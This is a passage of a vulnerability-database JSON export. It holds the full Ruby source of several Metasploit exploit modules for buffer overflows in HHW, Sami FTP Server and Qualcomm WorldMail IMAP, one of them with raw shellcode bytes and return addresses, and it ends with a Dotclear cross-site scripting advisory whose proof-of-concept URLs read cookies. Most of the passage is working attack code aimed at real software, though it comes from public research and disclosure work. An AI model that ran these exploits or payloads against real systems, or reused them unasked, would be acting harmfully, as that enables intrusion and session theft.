0x00401F93 } ], # CALL EDI hhw.exe v4.74.8702.0\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Feb 06 2006',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ false, 'The file name.', 'msf.hhp']),\n ])\n end\n\n def exploit\n\n # use the egghunter!\n eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })\n\n off = target['Offset']\n idxf = \"\"\n idxf << make_nops(off - eh_stub.length)\n idxf << eh_stub\n idxf << [target.ret].pack('V')\n\n sploit = \"[OPTIONS]\\r\\n\"\n sploit << \"Contents file=\"\n sploit << idxf\n sploit << \"\\r\\n\"\n sploit << \"\\r\\n\"\n sploit << \"[FILES]\\r\\n\"\n sploit << \"\\r\\n\"\n sploit << eh_egg\n\n hhp = sploit\n\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\n\n file_create(hhp)\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb"}, {"lastseen": "2019-12-07T16:29:59", "bulletinFamily": "exploit", "description": "This module exploits the KarjaSoft Sami FTP Server version 2.02 by sending an excessively long USER string. The stack is overwritten when the administrator attempts to view the FTP logs. Therefore, this exploit is passive and requires end-user interaction. Keep this in mind when selecting payloads. 
When the server is restarted, it will re-execute the exploit until the logfile is manually deleted via the file system.\n", "modified": "2017-11-08T16:00:24", "published": "2008-03-17T14:23:01", "id": "MSF:EXPLOIT/WINDOWS/FTP/SAMI_FTPD_USER", "href": "", "type": "metasploit", "title": "KarjaSoft Sami FTP Server v2.02 USER Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name'\t\t=> 'KarjaSoft Sami FTP Server v2.02 USER Overflow',\n 'Description'\t=> %q{\n This module exploits the KarjaSoft Sami FTP Server version 2.02\n by sending an excessively long USER string. The stack is overwritten\n when the administrator attempts to view the FTP logs. Therefore, this exploit\n is passive and requires end-user interaction. Keep this in mind when selecting\n payloads. 
When the server is restarted, it will re-execute the exploit until\n the logfile is manually deleted via the file system.\n },\n 'Author'\t=> [ 'aushack' ],\n 'Arch'\t\t=> [ ARCH_X86 ],\n 'License'\t=> MSF_LICENSE,\n 'Stance'\t=> Msf::Exploit::Stance::Passive,\n 'References'\t=>\n [\n # This exploit appears to have been reported multiple times.\n [ 'CVE', '2006-0441'],\n [ 'CVE', '2006-2212'],\n [ 'OSVDB', '25670'],\n [ 'BID', '16370'],\n [ 'BID', '22045'],\n [ 'BID', '17835'],\n [ 'EDB', '1448'],\n [ 'EDB', '1452'],\n [ 'EDB', '1462'],\n [ 'EDB', '3127'],\n [ 'EDB', '3140']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'seh',\n },\n 'Platform' \t=> ['win'],\n 'Privileged'\t=> false,\n 'Payload'\t=>\n {\n 'Space'\t\t\t=> 300,\n 'BadChars'\t\t=> \"\\x00\\x0a\\x0d\\x20\\xff\",\n 'StackAdjustment'\t=> -3500,\n },\n 'Targets' \t=>\n [\n [ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll\n [ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd11a9 } ], # p/p/r ws2help.dll\n [ 'Windows 2000 Pro All - French', { 'Ret' => 0x74fa12bc } ], # p/p/r ws2help.dll\n [ 'Windows XP SP0/1 - English', { 'Ret' => 0x71aa32ad } ], # p/p/r ws2help.dll\n ],\n 'DisclosureDate' => 'Jan 24 2006'))\n\n register_options(\n [\n Opt::RPORT(21),\n ])\n end\n\n def check\n connect\n banner = sock.get_once(-1, 3)\n disconnect\n\n if (banner =~ /Sami FTP Server 2\\.0\\.2/)\n return Exploit::CheckCode::Appears\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n connect\n\n sploit = Rex::Text.rand_text_alphanumeric(596) + generate_seh_payload(target.ret)\n\n login = \"USER #{sploit}\\r\\n\"\n login << \"PASS \" + Rex::Text.rand_char(payload_badchars)\n\n sock.put(login + \"\\r\\n\")\n\n handler\n disconnect\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/ftp/sami_ftpd_user.rb"}, {"lastseen": "2019-11-30T03:57:08", 
"bulletinFamily": "exploit", "description": "This module exploits a stack buffer overflow in the Qualcomm WorldMail IMAP Server version 3.0 (builds 6.1.19.0 through 6.1.22.0). Version 6.1.22.1 fixes this particular vulnerability. NOTE: The service does NOT restart automatically by default. You may be limited to only one attempt, so choose wisely!\n", "modified": "2017-07-24T13:26:21", "published": "2006-10-25T22:03:40", "id": "MSF:EXPLOIT/WINDOWS/IMAP/EUDORA_LIST", "href": "", "type": "metasploit", "title": "Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Imap\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in the Qualcomm WorldMail IMAP Server\n version 3.0 (builds 6.1.19.0 through 6.1.22.0). Version 6.1.22.1 fixes this\n particular vulnerability.\n\n NOTE: The service does NOT restart automatically by default. 
You may be limited to\n only one attempt, so choose wisely!\n },\n 'Author' => [ 'MC', 'jduck' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2005-4267'],\n [ 'OSVDB', '22097'],\n [ 'BID', '15980'],\n\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Payload' =>\n {\n 'Space' => 750,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x7b\",\n 'StackAdustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', { } ],\n [ 'WorldMail 3 Version 6.1.19.0', { 'Ret' => 0x600b6317 } ], # p/p/r in MLstMgr.dll v6.1.19.0\n [ 'WorldMail 3 Version 6.1.20.0', { 'Ret' => 0x10022187 } ], # p/p/r in msremote.dll ?\n [ 'WorldMail 3 Version 6.1.22.0', { 'Ret' => 0x10022187 } ], # p/p/r in MsRemote.dll v6.1.22.0\n ],\n 'DisclosureDate' => 'Dec 20 2005',\n 'DefaultTarget' => 0))\n end\n\n def check\n targ = auto_target\n disconnect\n\n return Exploit::CheckCode::Appears if (targ)\n return Exploit::CheckCode::Safe\n end\n\n def auto_target\n connect\n\n if (banner and banner =~ /WorldMail/ and banner =~ /IMAP4 Server (.*) ready/)\n version = $1\n ver = version.split('.')\n if (ver.length == 4)\n major = ver[0].to_i\n minor = ver[1].to_i\n rev = ver[2].to_i\n build = ver[3].to_i\n if (major == 6 and minor == 1)\n return targets[1] if (rev == 19)\n return targets[2] if (rev == 20)\n return targets[3] if (rev == 22)\n end\n end\n end\n\n # no target found\n nil\n end\n\n def exploit\n if (target_index == 0)\n mytarget = auto_target\n if mytarget\n print_status(\"Automatically detected \\\"#{mytarget.name}\\\" ...\")\n else\n fail_with(Failure::NoTarget, 'Unable to automatically detect a target')\n end\n else\n mytarget = target\n connect\n end\n\n jmp = \"\\x6a\\x05\\x59\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x2f\\x77\\x28\"\n jmp << \"\\x4b\\x83\\xeb\\xfc\\xe2\\xf4\\xf6\\x99\\xf1\\x3f\\x0b\\x83\\x71\\xcb\\xee\\x7d\"\n jmp << \"\\xb8\\xb5\\xe2\\x89\\xe5\\xb5\\xe2\\x88\\xc9\\x4b\"\n\n sploit = \"a001 LIST \" + 
rand_text_alphanumeric(20)\n sploit << payload.encoded\n sploit << generate_seh_record(mytarget.ret)\n sploit << make_nops(8) + jmp + rand_text_alphanumeric(40)\n sploit << \"}\" + \"\\r\\n\"\n\n sock.put(sploit)\n\n handler\n disconnect\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/imap/eudora_list.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:21", "bulletinFamily": "software", "description": "Dotclear 1.* Cross Site Scripting Vulnerability\r\n\r\n\r\n1--two cross site scripting vulnerabilities have been discovered in the\r\ndotclear1.* allowing a remote attackers to hijack authenticated session\r\nWorkaround:\r\n$post_id (trackback.php)\r\n$tool_url(/tools/thememng/index.php)\r\nare not filtered\r\n2-Proof of Concepts:\r\ndotclear/ecrire/trackback.php?post_id="><script>alert(document.cookie\r\n);</script>\r\n\r\n/ecrire/tools.php?tool_url=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&p=thememng\r\n\r\n\r\n3-Disclosure timeline\r\n05/04/2007 dotclear team contacted\r\n10/04/2007 fixed\r\n\r\n4-solution:\r\nupgrade to dotclear 1.2.6\r\nhttp://www.dotclear.net/\r\n\r\nfound by nassim\r\nhttp://www.securlabs.com/", "modified": "2007-04-13T00:00:00", "published": "2007-04-13T00:00:00", "id": "SECURITYVULNS:DOC:16702", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16702", "title": "[Full-disclosure] Dotclear 1.* Cross Site Scripting Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}